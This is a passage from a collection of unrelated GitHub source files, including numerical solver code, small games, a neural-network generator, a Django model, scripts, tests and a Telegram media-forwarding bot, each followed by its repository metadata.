Compute the +,- sums of antidifusive fluxes to node i\n #\n n = len(u_numpy)\n Pplus = np.empty(n); Pminus = np.empty(n)\n for i in range(n):\n # a) Get pointers to begin and end of nz elements in row i\n i0, i1 = I[i], I[i+1]\n i_diag = i0 + index( C[i0:i1], i ) # Pointer to diagonal elment\n\n F0, F1 = F_vals[i0:i_diag], F_vals[i_diag+1:i1]\n Pplus[i] = np.sum( np.maximum(F0,0) ) + np.sum( np.maximum(F1,0) )\n Pminus[i] = np.sum( np.minimum(F0,0) ) + np.sum( np.minimum(F1,0) )\n\n Qplus = np.empty(n); Qminus = np.empty(n)\n for i in range(n):\n # a) Get pointers to begin and end of nz elements in row i\n i0, i1 = I[i], I[i+1]\n i_diag = i0 + index( C[i0:i1], i ) # Pointer to diagonal elment\n j_cols = C[i0:i1] # Nz columns in row i\n j_cols_but_i = j_cols[ j_cols!=i ]\n # print(\"i =\", i, \":\", j_cols_non_i)\n\n # b) Compute u[j] - u[i] for all columns j in row i\n U_ji = u_numpy[j_cols_but_i] - u_numpy[i]\n\n Qplus[i] = np.maximum( np.max(U_ji), 0 )\n Qminus[i] = np.minimum( np.min(U_ji), 0 )\n\n Rplus = np.empty(n); Rminus = np.empty(n)\n # Object to access the FEniCS matrix ML a CSR matrix\n ML_CSR = CSR_Matrix(self.ML)\n # Get arrays defining the storage of ML in CSR sparse matrix format,\n _, _, ML_vals = ML_CSR.get_values_CSR()\n j = 0\n N = len(ML_vals)\n ML_diagonal = np.zeros(n)\n fp_tol = 1.e-20\n for i in range(N):\n if abs(ML_vals[i])>0:\n ML_diagonal[j]=ML_vals[i]\n j=j+1\n print(\"ML_diagonal:\", ML_diagonal)\n for i in range(n):\n if abs(Pplus[i]) < fp_tol:\n Rplus[i] = 0\n else:\n Rplus[i] = np.minimum(1, Qplus[i]*ML_diagonal[i]/(dt*Pplus[i]))\n if abs(Pminus[i]) < fp_tol:\n Rminus[i] = 0\n else:\n Rminus[i] = np.minimum(1, Qminus[i]*ML_diagonal[i]/(dt*Pminus[i]))\n\n print(\"#Pplus:\", Pplus);\n print(\"#Pminus:\", Pminus);\n print(\"#Qplus:\", Qplus);\n print(\"#Qminus:\", Qminus);\n print(\"#ML_vals:\", ML_vals);\n print(\"#Rplus:\", Rplus);\n print(\"#Rminus:\", Rminus);\n\n alpha_CSR = F_CSR.duplicate()\n # Get arrays defining the storage of ML in CSR sparse matrix format,\n I, C, alpha_vals = alpha_CSR.get_values_CSR()\n for i in range(n):\n i0, i1 = I[i], I[i+1]\n jColumns = C[i0:i1]\n alpha_vals[i0:i1] = np.where(\n F_vals[i0:i1]>0,\n np.minimum(Rplus[i], Rminus[jColumns]),\n np.minimum(Rminus[i], Rplus[jColumns])\n )\n alpha_CSR.set_values(alpha_vals)\n self.alpha = alpha_CSR.to_FEniCS_matrix()\n if self.check_parameter(\"save_matrices\"):\n print(\"Saving alpha\")\n save_coo_matrix(self.alpha, \"alpha.matrix.coo\")\n\n #########################\n\n barFunction = Function(self.Vh);\n barf = barFunction.vector()\n for i in range(n):\n i0, i1 = I[i], I[i+1]\n i_diag = i0 + index( C[i0:i1], i ) # Pointer to diagonal elment\n # Under- and super-diagonal values\n F0, F1 = F_vals[i0:i_diag], F_vals[i_diag+1:i1]\n alpha0, alpha1 = alpha_vals[i0:i_diag], alpha_vals[i_diag+1:i1]\n barf[i] = np.sum( F0*alpha0 ) + np.sum( F1*alpha1 )\n\n A = self.ML - dt*self.KL\n b = self.ML * self.u0.vector() - dt*barf\n print(\"Solving high order scheme\")\n print(\"barf=\", barf.vec().getArray())\n solve (A, self.u.vector(), b) # Solve A*u = b\n","repo_name":"AlbaNaIz/ks_flux_correction","sub_path":"fenics/keller_segel/flux_correct.py","file_name":"flux_correct.py","file_ext":"py","file_size_in_byte":13388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13585095950","text":"#tic tac toe\nfrom random import randint, choice\n\ndef get_move():\n move = ''\n move_input = False\n while not move_input:\n move = input('Please 
input move location as coords from 1,1 to 3,3: ')\n move = move.split(',')\n if len(move) == 2:\n if move[0].isnumeric() and move[1].isnumeric():\n if 0 < int(move[0]) < 4 and 0 < int(move[1]) < 4:\n move_input = True\n print(move)\n else:\n print('Please just enter two integers separated with single comma in format: \"3,2\"')\n move = [int(x)-1 for x in move]\n return move\n\ndef print_board(moves):\n print(f'{moves[0][0]} ¦ {moves[0][1]} ¦ {moves[0][2]}\\n'\n f'{moves[1][0]} ¦ {moves[1][1]} ¦ {moves[1][2]}\\n'\n f'{moves[2][0]} ¦ {moves[2][1]} ¦ {moves[2][2]}\\n')\n\ndef select_first_player():\n if randint(0,1):\n print('Computer starts')\n return 1\n else:\n print('User starts')\n return 0\n\ndef find_empty_spot(moves):\n empty_spaces = []\n for idx_r, row in enumerate(moves):\n for idx_c, column in enumerate(row):\n if ' ' in column:\n empty_spaces.append([idx_r, idx_c])\n print(f'empty space: {empty_spaces}')\n return empty_spaces\n\ndef check_win(moves, letter):\n for row in moves: #check rows\n matching = [s for s in row if letter in s]\n # print(len(matching))\n if len(matching) == 3:\n print('row matching:')\n return True\n for idx in range(3):\n # print(idx)\n column_lists = [item[idx] for item in moves]\n matching = [s for s in column_lists if letter in s]\n # print(len(matching))\n if len(matching) == 3:\n print(len(matching))\n return True\n diag1 = [moves[0][0],moves[1][1],moves[2][2]]\n matching = [s for s in diag1 if letter in s]\n if len(matching) == 3:\n print('diag 1 true')\n return True\n diag2 = [moves[0][2], moves[1][1], moves[2][0]]\n matching = [s for s in diag2 if letter in s]\n if len(matching) == 3:\n print('diag 2 true')\n return True\n return False\n\nrunning_game = 1\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n while running_game:\n moves = [[' ', ' ', ' '], [' ', ' ', ' '], [' ', ' ', ' ']]\n player = select_first_player() #1 = computer, 0 = user\n playing = 1 #set playing loop\n print_board(moves)\n while playing:\n if player: #computer (C)\n empty_space_lst = find_empty_spot(moves)\n place = choice(empty_space_lst)\n moves[place[0]][place[1]] = 'C'\n print_board(moves)\n player = 0\n if check_win(moves, 'C'):\n print('comp is winner')\n playing = 0\n else: #user\n loop_move = 1\n move = get_move()\n while loop_move:\n if moves[move[0]][move[1]] == ' ':\n moves[move[0]][move[1]] = 'U'\n loop_move = False\n else:\n 'Cant place there, please try again'\n move = get_move()\n print_board(moves)\n player = 1\n if check_win(moves, 'U'):\n print('user is winner')\n playing = 0\n keep_playing = input('keep playing (y/n)?')\n if keep_playing.lower() == 'n':\n running_game = 0\n # get_move()\n # print_board(moves)\n # running_game = 0\n\n\n","repo_name":"Rory-Williams/TicTacToe","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5196626787","text":"'''\r\nGame of Life\r\n- Contrast NumPy arrays to standard Python lists.\r\n- Create data visualizations.\r\n- Manage a Pandas dataframe.\r\n\r\n\r\nJesse Renteria III\r\nWeek 9 - 05/23/2022\r\n\r\nI have not given or received any unauthorized assistance on this assignment.\r\n\r\nYouTube Link:\r\nhttps://youtu.be/8pbAe4zz5Co\r\n\r\n'''\r\n\r\n#from curses.panel import bottom_panel, top_panel\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt \r\nfrom matplotlib import colors \r\nfrom matplotlib.pyplot import figure, draw, 
pause\r\nimport math\r\n\r\ndef main():\r\n 'displays the Conway Board(s)'\r\n greeting()\r\n s = sizeQ()\r\n p = probabilityQ()\r\n t = iterationQ()\r\n response = boardQ() # show all iterations or only last\r\n board = conway(s, p)\r\n allboard = advance(board,t) # keeps all boards\r\n display(allboard,s,t,response) # function will determine whether or not to show all or just final board\r\n\r\ndef greeting():\r\n 'print greeting'\r\n print('Howdy User! \\n\\nWe will be playing the Game of Life.')\r\n \r\ndef sizeQ(): # Ask what the user wants the size to be?\r\n 'return response'\r\n response = int(input('\\nWhat size would you like the array to be?: '))\r\n return response\r\n\r\ndef probabilityQ(): # Ask what the user wants the probability to be?\r\n 'return response'\r\n print('\\nPlease enter a decimal number between 0 and 1: ') \r\n response = float(input('What would you like the probability to be ?: '))\r\n return response\r\n\r\ndef iterationQ(): # Ask how many iterations wants to do?\r\n 'return response'\r\n response = int(input('\\nHow many iterations would you like the board to undergo?: '))\r\n return response\r\n\r\ndef boardQ(): # Ask user if they want to see all the board versions\r\n \"return response == 'YES'\" # True or False\r\n print('\\nPlease answer will yes or no to the following question: ')\r\n response = input('Would you like to see all of the different board version?: ')\r\n return response.upper() == 'YES'\r\n\r\ndef conway(s, p): # s = size of the array & p = probability of alive cells on board\r\n 'return board'\r\n alive = round(p*s) # need to round just in case if it is a decimal\r\n dead = s-alive\r\n dimensions = int(math.sqrt(s)) # if s=100 then it will be 10 by 10 # convert to int from float\r\n board = np.array([1]*alive + [0]*dead)\r\n np.random.shuffle(board)\r\n board.shape = (dimensions,dimensions) \r\n return board\r\n\r\ndef advance(b,t): # curious if there is a faster way or not \r\n 'return b -- new version based on t times'\r\n dim = b.shape\r\n size = dim[0]\r\n maxD = dim[0]-1\r\n allBoards = [] # put all arrays (versions of the boards) in here\r\n for round in range(1,t+1): \r\n newB = []\r\n for y in range(size):\r\n upper = upperORleftN(y,maxD)\r\n lower = lowerORrightN(y,maxD)\r\n for x in range(size):\r\n left = upperORleftN(x,maxD)\r\n right = lowerORrightN(x,maxD)\r\n allNs = neighbors(b,x,y,upper,lower,right,left) # max would be 8\r\n loc = b[y,x]\r\n if loc == 1:\r\n if allNs < 2:\r\n newB.append(0) # becomes 0 (die by underpopulation)\r\n elif allNs == 2 or allNs == 3:\r\n newB.append(1) # stays 1 (lives on to next gen)\r\n elif allNs > 3:\r\n newB.append(0) # becoms 0 (die by overpopulation)\r\n elif loc == 0:\r\n if allNs == 3:\r\n newB.append(1) # becomes 1 (lives by reproduction)\r\n else:\r\n newB.append(loc)\r\n allBoards.append(newB)\r\n b = np.array(newB) # allows for the new version of the board to be created\r\n b.shape = dim # sets up the board properly\r\n return allBoards \r\n\r\ndef neighbors(b,x,y,upper,lower,right,left):\r\n 'return allNs'\r\n n1 = b[upper,left] \r\n n2 = b[upper,x] \r\n n3 = b[upper,right] \r\n n4 = b[y,left] \r\n n5 = b[y,right] \r\n n6 = b[lower,left] \r\n n7 = b[lower,x] \r\n n8 = b[lower,right] \r\n allNs = n1 + n2 + n3 + n4 + n5 + n6 + n7 + n8\r\n return allNs\r\n\r\ndef upperORleftN(xy,maxD): # to figure out the uppper/left value\r\n 'return upperORleft'\r\n if xy == 0: \r\n upperORleft = maxD\r\n else:\r\n upperORleft = xy-1\r\n return upperORleft\r\n\r\ndef lowerORrightN(xy,maxD): # to 
figure out the lower/right value\r\n 'return lowerORright'\r\n if xy == maxD: \r\n lowerORright = 0\r\n else:\r\n lowerORright = xy+1 \r\n return lowerORright \r\n\r\ndef display(allBoards,size,round,response):\r\n 'plt.show()'\r\n dim = int(size**(1/2))\r\n if int(response) == 1: # shows all boards\r\n while True:\r\n length = len(allBoards)\r\n fg = figure()\r\n ax = fg.gca()\r\n\r\n newboard = np.array(allBoards[0])\r\n newboard.shape = (dim,dim)\r\n colormap = colors.ListedColormap(['white', 'black']) # white is 0 black is 1\r\n h = ax.imshow(newboard, cmap=colormap)\r\n \r\n for n in range(1,length+1):\r\n nboard = np.array(allBoards[n-1])\r\n nboard.shape = (dim,dim)\r\n h.set_data(nboard)\r\n plt.title(f'{dim}x{dim} Conway Board at T={n}')\r\n draw(), pause(1)\r\n if not exitCode():\r\n break\r\n\r\n else: # shows only final board\r\n newBoard = np.array(allBoards[-1])\r\n newBoard.shape = (dim,dim)\r\n colormap = colors.ListedColormap(['white', 'black']) # white is 0 black is 1\r\n plt.imshow(newBoard,cmap=colormap)\r\n plt.title(f'{dim}x{dim} Conway Board at T={round}') \r\n plt.show()\r\n\r\n\r\ndef exitCode(): #determines whether or not to exit the code\r\n 'returns True or False'\r\n response = input('\\nWould you like to see the different board versions again? (Yes or No): ')\r\n return response.strip().upper() == 'YES'\r\n\r\nmain()\r\n\r\n","repo_name":"renteria3/Python_Code","sub_path":"Game of Life.py","file_name":"Game of Life.py","file_ext":"py","file_size_in_byte":5955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26090023630","text":"import torch\nimport torch.nn as nn\nimport torch.nn.init as init\n\nfrom ast import literal_eval\nfrom src.model.generator.MRF import MRF\nfrom torch.nn.utils import weight_norm\n\n\nclass Generator(nn.Module):\n def __init__(self, d_input, d_inner, k_u, k_r, D_r):\n super().__init__()\n k_u, k_r, D_r = literal_eval(k_u), literal_eval(k_r), literal_eval(D_r)\n self.input_layer = weight_norm(nn.Conv1d(d_input, d_inner,\n kernel_size=7, stride=1, padding=3))\n self.relu = nn.LeakyReLU(0.1)\n self.tanh = nn.Tanh()\n self.upsampling_blocks = nn.ModuleList()\n self.mrfs = nn.ModuleList()\n\n curr_channels = d_inner\n for i in range(len(k_u)):\n self.upsampling_blocks.append(\n weight_norm(nn.ConvTranspose1d(in_channels=curr_channels,\n out_channels=curr_channels // 2,\n kernel_size=k_u[i], stride=k_u[i] // 2,\n padding=(k_u[i] - k_u[i] // 2) // 2))\n )\n curr_channels //= 2\n self.mrfs.append(MRF(curr_channels, k_r, D_r))\n\n self.output_layer = weight_norm(nn.Conv1d(curr_channels, 1, kernel_size=7, padding=3))\n self.apply(self.__init_weights)\n\n @staticmethod\n def __init_weights(layer):\n if isinstance(layer, (nn.Conv1d, nn.ConvTranspose1d)):\n init.normal_(layer.weight, 0, 0.01)\n init.constant_(layer.bias, 0)\n\n def forward(self, x):\n x = self.input_layer(x)\n for i in range(len(self.upsampling_blocks)):\n x = self.relu(x)\n x = self.upsampling_blocks[i](x)\n x = self.mrfs[i](x)\n x = self.output_layer(self.relu(x))\n return self.tanh(x)\n","repo_name":"johanDDC/vocoder","sub_path":"src/model/generator/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24782097146","text":"from django.db import models\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.utils import timezone\nfrom 
django.utils.html import format_html\nfrom PIL import Image\nfrom django.contrib.auth import get_user_model\nfrom custom_auth.validator import image_validator\nUser = get_user_model()\n\n# Create your models here.\nclass UserProfile(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n phone_number = models.CharField(max_length=15, blank=True, null=True)\n date_of_birth = models.DateField(blank=True, null=True)\n street = models.CharField(max_length=100, blank=True, null=True)\n city = models.CharField(max_length=50, blank=True, null=True)\n state = models.CharField(max_length=50, blank=True, null=True)\n postal_code = models.CharField(max_length=10, blank=True, null=True)\n country = models.CharField(max_length=50, blank=True, null=True)\n billing_address = models.TextField(max_length=100, blank=True, null=True)\n profile_picture = models.ImageField(upload_to='profile_pictures/', validators=[image_validator], blank=True, null=True, help_text='Must be .jpeg .jpg .png Format and Size should not exceed 2 MiB.')\n\n\n created_at = models.DateTimeField(auto_now_add=True, editable=False)\n updated_at = models.DateTimeField(auto_now=True, editable=False)\n created_by = models.ForeignKey(User, on_delete=models.PROTECT, related_name='created_%(class)ss')\n updated_by = models.ForeignKey(User, on_delete=models.PROTECT, related_name='updated_%(class)ss', null=True, blank=True)\n \n def __str__(self):\n return self.user.username\n\n def image_tag(self):\n return format_html('', self.profile_picture)\n\n image_tag.short_description = 'Image'\n image_tag.allow_tags = True\n\n def save(self, *args, **kwargs):\n super(UserProfile, self).save(*args, **kwargs)\n try:\n if self.profile_picture:\n img = Image.open(self.profile_picture.path)\n if img.height > 300 or img.width > 300:\n image_size = (300, 300)\n img.thumbnail(image_size)\n img.save(self.profile_picture.path)\n except Exception as e:\n pass\n # print(str(e))","repo_name":"monir07/devxhub-ecommerce","sub_path":"user_profile/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5622814310","text":"class Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\nclass LinkedList:\n def __init__(self, value):\n new_node = Node(value)\n self.head = new_node\n self.tail = new_node\n self.length = 1\n\n def append(self, value):\n new_node = Node(value)\n if self.length == 0:\n self.head = new_node\n self.tail = new_node\n else:\n self.tail.next = new_node\n self.tail = new_node\n self.length += 1\n\n def remove_duplicates(self):\n values = set()\n previous = None\n current = self.head\n while current:\n if current.value in values:\n previous.next = current.next\n self.length -= 1\n else:\n values.add(current.value)\n previous = current\n current = current.next\n\n def print_all(self):\n values=[]\n temp=self.head\n while temp is not None:\n values.append(str(temp.value))\n temp=temp.next\n print(' -> '.join(values))\n\nmy_linked_list = LinkedList(1)\nmy_linked_list.append(1)\nmy_linked_list.append(2)\nmy_linked_list.append(3)\nmy_linked_list.append(3)\nmy_linked_list.append(2)\nmy_linked_list.append(4)\nmy_linked_list.remove_duplicates()\n\nmy_linked_list.print_all()","repo_name":"bnasare/DSA","sub_path":"LINKED LIST/LeetCode 
Questions/remove_duplicates.py","file_name":"remove_duplicates.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33563715065","text":"t# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 5 15:38:04 2019\n\n@author: leilei\n\"\"\"\n\nimport os\n#遍历文件夹 \ndef recurrence(path,file_list):\n for file in os.listdir(path):\n fs = os.path.join(path, file)\n if os.path.isfile(fs):\n file_list.append(fs)\n elif os.path.isdir(fs):\n recurrence(fs, file_list) \ndef main(): \n path_1 = 'D:\\\\Human_matting\\\\SImple_segmentation'\n path_2 = 'D:\\\\EG2000\\\\test_masks'\n filenames_1 = [] # 带路径的文件名存入列表\n filenames_2 = []\n recurrence(path_1, filenames_1)\n recurrence(path_2, filenames_2) \n f1 = open(\"D:\\Human_matting\\\\evalue_accurate.txt\", \"w\")\n for filename_1, filename_2 in zip(filenames_1, filenames_2): \n newname_1=str(filename_1).replace('\\\\','/')\n newname_2=str(filename_2).replace('\\\\','/')\n f1.write(newname_1+' '+newname_2+'\\n')\n f1.close() # 要记得关闭!\n# f2 = open(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\Datas\\\\matting.txt\", \"w\")\n# for filename in filenames_2:\n# f2.write(filename+'\\n')\n# f2.close() # 要记得关闭!\n# print(len(filenames_1))\n# print(len(filenames_2))\nif __name__ == \"__main__\":\n main()\n print('finish!!!!')","repo_name":"lijiashu/Human_matting","sub_path":"generate_pic_path.py","file_name":"generate_pic_path.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21963703509","text":"\"\"\"\n$Id$\n\"\"\"\n\n### JCALERT: Does this file is of any interrest now?\n\n__version__='$Revision$'\n\nimport unittest\n\nclass TestDummy(unittest.TestCase):\n def test_add(self):\n self.assertEqual(1+1,2)\n\n\n\nsuite = unittest.TestSuite()\n# Uncomment the following line of code, to disable the test if\n# $DISPLAY is undefined. 
Used mainly for GUI testing.\n# suite.requires_display = True\nsuite.addTest(unittest.makeSuite(TestDummy))\n","repo_name":"jesuscript/topo-mpi","sub_path":"topo/tests/testdummy.py","file_name":"testdummy.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"35368723950","text":"import sys\nimport io\n\nsys.stdout = io.TextIOWrapper(sys.stdout.detach(), encoding = 'utf-8')\nsys.stderr = io.TextIOWrapper(sys.stderr.detach(), encoding = 'utf-8')\n\n\n\"\"\"\n\n\"\"\"\n\nfrom selenium import webdriver\n\noptions = webdriver.ChromeOptions()\noptions.headless = True\noptions.add_argument(\"window-siez=1920x1080\")\n# headless 사용시 user-agent 입력이 필요할 수 있음.\noptions.add_argument(\"user-agent =Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36\")\n\nbrowser = webdriver.Chrome(options=options)\nbrowser.maximize_window()\n\nurl = \"https://www.whatismybrowser.com/detect/what-is-my-user-agent\"\nbrowser.get(url)\n\n#\ndetected_value = browser.find_element_by_id(\"detected_value\")\nprint(detected_value.text)\nbrowser.quit()\n","repo_name":"Suyoung-Yang/workspace2","sub_path":"webscraping_basic/18_headless_chrome_useragent.py","file_name":"18_headless_chrome_useragent.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11751807146","text":"'''\nCreated on Dec 27, 2012\n\n@author: pew\n'''\nimport unittest\n\nfrom puzzle.nearestpoints import PointEvaluator,Point\n\n\ntext = \"g fmnc wms bgblr rpylqjyrc gr zw fylb. rfyrq ufyr amknsrcpq ypc dmp. bmgle gr gl zw fylb gq glcddgagclr ylb rfyr'q ufw rfgq rcvr gq qm jmle. sqgle qrpgle.kyicrpylq() gq pcamkkclbcb. 
lmu ynnjw ml rfc spj.\"\n\nclass PointTest(unittest.TestCase):\n def testDistance(self):\n point = Point(3,4)\n self.assertEqual(5, point.distanceFromZero())\n\n\nclass DistTest(unittest.TestCase):\n \n def testBasicListBehaviour(self):\n numbers = range(0,100)\n indexOfLastElement = -1\n self.assertEqual(99, numbers[indexOfLastElement])\n self.assertEqual(0, numbers[0])\n self.assertEqual(100,len(numbers))\n\n\n def testAddIfBetterWhenListIsNotFull(self):\n n = PointEvaluator()\n numbers = range(0,PointEvaluator.BEST_POINTS_LIST_LENGTH-1)\n numbers = n.addIfBetter(numbers, 200)\n self.assertEqual(200,numbers[-1])\n\n def testAddIfBetter(self):\n n = PointEvaluator()\n numbers = range(0,99)\n numbers.append(200)\n n.addIfBetter(numbers, 100)\n self.assertEqual(100,numbers[-1])\n\n def testDist(self):\n n = PointEvaluator()\n x = n.dist(3,4)\n self.assertEqual(25,x)\n pass\n\n\nif __name__ == \"__main__\":\n #import sys;sys.argv = ['', 'Test.testDist']\n unittest.main()","repo_name":"1pindsvin/yagni","sub_path":"puzzle/unittests/puzzle/nearestpoints_fixture.py","file_name":"nearestpoints_fixture.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"41643073574","text":"from typing import List\n\n\nclass Solution:\n def longestWPI(self, hours: List[int]) -> int:\n\n prefix = 0\n d = {}\n res = 0\n for i, h in enumerate(hours):\n prefix += 1 if h > 8 else -1\n\n if prefix > 0:\n res = i + 1\n elif prefix - 1 in d:\n res = max(res, i - d[prefix - 1])\n\n if not prefix in d:\n d[prefix] = i\n\n return res\n\n\n\n\n\nprint(Solution().longestWPI([6,5,9,6,9,9,2]))\n\n\n\n","repo_name":"224nth/leetcode","sub_path":"problems/lc_1124.py","file_name":"lc_1124.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73729088482","text":"#!/usr/bin/env python3\n\n\"\"\"\nCounts the number of title lines in a FCP7 XML file.\n\nUsage: python3 trad_count.py input/XMLNAME\n\n\"\"\"\nfrom lxml import etree\nimport sys\n\ninput_file = sys.argv[1]\n\nfilename_txt = input_file[:-4] + '_count.txt'\n\ntree = etree.parse(input_file)\n\nroot = tree.getroot()\n\nsequence = root.find('sequence')\n\nmedia = sequence.find('media')\n\nvideo = media.find('video')\n\ndef get_track_list(video_or_audio):\n return(video_or_audio.findall('track'))\n\ntrack_list = get_track_list(video)\n \nv1 = track_list[0]\n\ntitle_list = v1.findall('generatoritem')\n\nwith open(filename_txt, 'w') as txt_output:\n line_list = []\n for title in title_list:\n effect = title.find('effect')\n parameter = effect.find('parameter')\n value = parameter.find('value')\n text = value.text\n letter_count = 0\n if text == None:\n print('pass')\n continue\n line = \"\"\n for letter in text:\n if letter in ['\\n','\\r','\\n\\r','\\r\\n']:\n line += letter\n letter_count +=1\n line_list.append(line)\n line = \"\"\n else:\n line += letter\n letter_count += 1\n if line:\n line_list.append(line)\n letter_count = 0\n\n count = 0\n short_line_list = [line for line in line_list if len(line) > 1]\n for line in short_line_list:\n count += 1\n num_line = str(count) + ': ' + line \n txt_output.write(num_line)\n 
txt_output.write('\\n')\n\nprint(count)\n","repo_name":"JimmyLamothe/trad","sub_path":"OLD/trad_count.py","file_name":"trad_count.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18955661991","text":"# @Lx0988 | @0FLX | 0AIB\nfrom AutoForward import CHANNEL_IDS\nimport logging, asyncio\nlogger = logging.getLogger(__name__)\nfrom pyrogram import Client, filters, enums\nfrom pyrogram.errors import FloodWait\n\nmedia_filter = filters.document | filters.video | filters.audio\n \n@Client.on_message(filters.chat(CHANNEL_IDS) & media_filter)\nasync def forward(client, update): \n try: \n await asyncio.sleep(300)\n await client.copy_message(\n chat_id=-1001857977699,\n from_chat_id=update.chat.id,\n message_id=update.id,\n caption=update.caption,\n parse_mode=enums.ParseMode.MARKDOWN\n )\n\n except FloodWait as e:\n await asyncio.sleep(e.value)\n\n\n@Client.on_message(filters.chat(-1001846691219) & filters.group & media_filter)\nasync def forward2auto(client, update):\n try: \n await asyncio.sleep(20)\n await client.copy_message(\n chat_id=-1001427335527,\n from_chat_id=-1001846691219,\n message_id=update.id,\n caption=f\"**{update.caption}**\" + \"\\n\\n\" + \"**@DXClassic**\",\n parse_mode=enums.ParseMode.MARKDOWN\n )\n\n except FloodWait as e:\n await asyncio.sleep(e.value)\n","repo_name":"FutureAIRobot/Forward-Client","sub_path":"AutoForward/plugins/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23107305837","text":"#!/usr/bin/python3\n\"\"\"\nUnit tests for models/engine/file_storage.py\n\"\"\"\nimport unittest\nfrom models.base_model import BaseModel\nfrom models.engine.file_storage import FileStorage\n\n\nclass TestFileStorage(unittest.TestCase):\n \"\"\"Unittest for class FileStorage\"\"\"\n\n def test_file_path_type(self):\n \"\"\"Check type of __file_path attribute\"\"\"\n self.assertEqual(type(FileStorage._FileStorage__file_path), str)\n\n def test_objects_type(self):\n \"\"\"Check type of __objects attribute\"\"\"\n self.assertEqual(type(FileStorage._FileStorage__objects), dict)\n\n def test_all_method(self):\n \"\"\"Check methods new(), all() and reload()\"\"\"\n storage = FileStorage()\n base1 = BaseModel()\n storage.new(base1)\n string_rep = f\"{base1.__class__.__name__}.{base1.id}\"\n self.assertEqual(storage.all()[string_rep], base1)\n all_objs = storage.all()\n self.assertIn(base1, all_objs.values())\n storage.reload()\n all_objs_reloaded = storage.all()\n self.assertIn(base1, all_objs_reloaded.values())\n\n def test_save_fs(self):\n \"\"\"Check save() method\"\"\"\n base2 = BaseModel()\n updated_at = base2.updated_at\n base2.save()\n last_updated_at = base2.updated_at\n self.assertNotEqual(updated_at, last_updated_at)\n\n def test_path(self):\n \"\"\"Create an FileStorage\"\"\"\n self.storage = FileStorage()\n self.path = \"file.json\"\n self.assertEqual(self.storage._FileStorage__file_path, 'file.json')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"cristian-encalada/holbertonschool-AirBnB_clone","sub_path":"tests/test_models/test_engine/test_file_storage.py","file_name":"test_file_storage.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15069166195","text":"#!/usr/bin/python3 \n'''\n Author : Karthikeyan_01\n 
Algo : Merge Sort \n Time Comp : O(n logn)\n'''\n\n\ndef merge(a , L , mid , R):\n n1 = mid - L + 1\n n2 = R - mid\n \n k = L\n\n Left = [0] * (n1)\n Right= [0] * (n2) \n\n for i in range(0 , n1):\n Left[i] = a[i+L]\n\n for j in range(0 , n2):\n Right[j] = a[j + mid + 1]\n\n i = 0\n j = 0\n while i < n1 and j < n2:\n if Left[i] <= Right[j]:\n a[k] = Left[i]\n k += 1\n i += 1\n else:\n a[k] = Right[j]\n k += 1\n j += 1\n\n while i < n1:\n a[k] = Left[i]\n i += 1\n k += 1\n while j < n2:\n a[k] = Right[j]\n j += 1\n k += 1\n\n\n\ndef mergesort(a , L , R):\n if L < R:\n mid = (L + R)//2\n mergesort(a , L , mid)\n mergesort(a , mid + 1 , R)\n merge(a , L , mid , R)\n\n\nif __name__ == '__main__':\n a = [ 2 , 7 , 3 , 5 , 4 , 1]\n n = len(a) \n print(\"Array Before Sorting\")\n for i in a:\n print(i , end = ' ')\n\n\n mergesort(a , 0 , n - 1)\n\n print('\\n')\n print(\"Array After Sorting\")\n for i in a:\n print(i , end=' ')\n\n\n\n","repo_name":"aniketsharma00411/algorithmsUse","sub_path":"Python/Sorting/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"54"} +{"seq_id":"42011342642","text":"\n# You are given the following information, but you may prefer to do some research for yourself.\n\n# 1 Jan 1900 was a Monday.\n# Thirty days has September,\n# April, June and November.\n# All the rest have thirty-one,\n# Saving February alone,\n# Which has twenty-eight, rain or shine.\n# And on leap years, twenty-nine.\n# A leap year occurs on any year evenly divisible by 4, but not on a century unless it is divisible by 400.\n# How many Sundays fell on the first of the month during the twentieth century (1 Jan 1901 to 31 